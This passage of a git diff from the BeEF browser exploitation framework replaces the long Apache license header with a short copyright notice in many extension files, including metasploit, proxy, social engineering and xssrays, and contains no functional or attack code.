-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/metasploit/module.rb b/extensions/metasploit/module.rb
index 8d2b0cc7c..55a371640 100644
--- a/extensions/metasploit/module.rb
+++ b/extensions/metasploit/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 # This is a dummy module to fool BeEF's loading system
diff --git a/extensions/metasploit/rpcclient.rb b/extensions/metasploit/rpcclient.rb
index 93ee61fa3..9affbfa5d 100644
--- a/extensions/metasploit/rpcclient.rb
+++ b/extensions/metasploit/rpcclient.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/notifications/channels/email.rb b/extensions/notifications/channels/email.rb
index fa49f024f..3ab2b06e0 100644
--- a/extensions/notifications/channels/email.rb
+++ b/extensions/notifications/channels/email.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 #
 #
diff --git a/extensions/notifications/channels/tweet.rb b/extensions/notifications/channels/tweet.rb
index 9f0ce6747..a3a1828aa 100644
--- a/extensions/notifications/channels/tweet.rb
+++ b/extensions/notifications/channels/tweet.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 #
 #
diff --git a/extensions/notifications/config.yaml b/extensions/notifications/config.yaml
index 925921522..2a32bff44 100644
--- a/extensions/notifications/config.yaml
+++ b/extensions/notifications/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     extension:
diff --git a/extensions/notifications/extension.rb b/extensions/notifications/extension.rb
index d5c5c04c8..d7feac539 100644
--- a/extensions/notifications/extension.rb
+++ b/extensions/notifications/extension.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/proxy/api.rb b/extensions/proxy/api.rb
index 13cf8dadf..6b921a8ac 100644
--- a/extensions/proxy/api.rb
+++ b/extensions/proxy/api.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Extension
diff --git a/extensions/proxy/config.yaml b/extensions/proxy/config.yaml
index 9eda17888..446f010a6 100644
--- a/extensions/proxy/config.yaml
+++ b/extensions/proxy/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     extension:
diff --git a/extensions/proxy/controllers/proxy.rb b/extensions/proxy/controllers/proxy.rb
index b77062a49..8614ffe79 100644
--- a/extensions/proxy/controllers/proxy.rb
+++ b/extensions/proxy/controllers/proxy.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/proxy/extension.rb b/extensions/proxy/extension.rb
index 1b3858c7b..fb6866963 100644
--- a/extensions/proxy/extension.rb
+++ b/extensions/proxy/extension.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/proxy/proxy.rb b/extensions/proxy/proxy.rb
index 3dfdb6cd4..4f6dfacb1 100644
--- a/extensions/proxy/proxy.rb
+++ b/extensions/proxy/proxy.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Extension
diff --git a/extensions/qrcode/config.yaml b/extensions/qrcode/config.yaml
index 39e7257b8..adfea35ba 100644
--- a/extensions/qrcode/config.yaml
+++ b/extensions/qrcode/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     extension:
diff --git a/extensions/qrcode/extension.rb b/extensions/qrcode/extension.rb
index bc2c176cf..56fe35bc0 100644
--- a/extensions/qrcode/extension.rb
+++ b/extensions/qrcode/extension.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/qrcode/qrcode.rb b/extensions/qrcode/qrcode.rb
index 5714501f5..aa2f44952 100644
--- a/extensions/qrcode/qrcode.rb
+++ b/extensions/qrcode/qrcode.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/requester/api.rb b/extensions/requester/api.rb
index 6f9db7b0d..c848e4f40 100644
--- a/extensions/requester/api.rb
+++ b/extensions/requester/api.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/requester/api/hook.rb b/extensions/requester/api/hook.rb
index 89fc83ef9..1faa059b0 100644
--- a/extensions/requester/api/hook.rb
+++ b/extensions/requester/api/hook.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Extension
diff --git a/extensions/requester/config.yaml b/extensions/requester/config.yaml
index 3e697324a..6836b2ef6 100644
--- a/extensions/requester/config.yaml
+++ b/extensions/requester/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     extension:
diff --git a/extensions/requester/controllers/requester.rb b/extensions/requester/controllers/requester.rb
index d15f0d19f..4a23eb530 100644
--- a/extensions/requester/controllers/requester.rb
+++ b/extensions/requester/controllers/requester.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/requester/extension.rb b/extensions/requester/extension.rb
index 9fbdafbbd..e26b5c72e 100644
--- a/extensions/requester/extension.rb
+++ b/extensions/requester/extension.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/requester/handler.rb b/extensions/requester/handler.rb
index 7183b3c65..60d579b7e 100644
--- a/extensions/requester/handler.rb
+++ b/extensions/requester/handler.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Extension
diff --git a/extensions/requester/models/http.rb b/extensions/requester/models/http.rb
index 06eb07b94..9c4c60b55 100644
--- a/extensions/requester/models/http.rb
+++ b/extensions/requester/models/http.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
diff --git a/extensions/social_engineering/config.yaml b/extensions/social_engineering/config.yaml
index bd5ffe0da..d048e3f78 100644
--- a/extensions/social_engineering/config.yaml
+++ b/extensions/social_engineering/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     extension:
diff --git a/extensions/social_engineering/extension.rb b/extensions/social_engineering/extension.rb
index 20f04a756..d272e50b0 100644
--- a/extensions/social_engineering/extension.rb
+++ b/extensions/social_engineering/extension.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/social_engineering/mass_mailer/mass_mailer.rb b/extensions/social_engineering/mass_mailer/mass_mailer.rb
index 31e0f6a19..ea0ab5a4d 100644
--- a/extensions/social_engineering/mass_mailer/mass_mailer.rb
+++ b/extensions/social_engineering/mass_mailer/mass_mailer.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Extension
diff --git a/extensions/social_engineering/models/interceptor.rb b/extensions/social_engineering/models/interceptor.rb
index ab92cdadd..08599e5e4 100644
--- a/extensions/social_engineering/models/interceptor.rb
+++ b/extensions/social_engineering/models/interceptor.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core
diff --git a/extensions/social_engineering/models/mass_mailer.rb b/extensions/social_engineering/models/mass_mailer.rb
index 142f2395e..64faa59aa 100644
--- a/extensions/social_engineering/models/mass_mailer.rb
+++ b/extensions/social_engineering/models/mass_mailer.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core
diff --git a/extensions/social_engineering/models/web_cloner.rb b/extensions/social_engineering/models/web_cloner.rb
index 2c4a0903c..0e18315cb 100644
--- a/extensions/social_engineering/models/web_cloner.rb
+++ b/extensions/social_engineering/models/web_cloner.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core
diff --git a/extensions/social_engineering/rest/socialengineering.rb b/extensions/social_engineering/rest/socialengineering.rb
index a0a85f7c2..332eebf6c 100644
--- a/extensions/social_engineering/rest/socialengineering.rb
+++ b/extensions/social_engineering/rest/socialengineering.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
diff --git a/extensions/social_engineering/web_cloner/interceptor.rb b/extensions/social_engineering/web_cloner/interceptor.rb
index 17e4e57c1..758bd3872 100644
--- a/extensions/social_engineering/web_cloner/interceptor.rb
+++ b/extensions/social_engineering/web_cloner/interceptor.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Extension
diff --git a/extensions/social_engineering/web_cloner/web_cloner.rb b/extensions/social_engineering/web_cloner/web_cloner.rb
index fcd527cf2..81854644e 100644
--- a/extensions/social_engineering/web_cloner/web_cloner.rb
+++ b/extensions/social_engineering/web_cloner/web_cloner.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Extension
diff --git a/extensions/xssrays/api.rb b/extensions/xssrays/api.rb
index ee98ed8e0..2eff2b316 100644
--- a/extensions/xssrays/api.rb
+++ b/extensions/xssrays/api.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/xssrays/api/scan.rb b/extensions/xssrays/api/scan.rb
index ce5d31548..0f4ca3691 100644
--- a/extensions/xssrays/api/scan.rb
+++ b/extensions/xssrays/api/scan.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
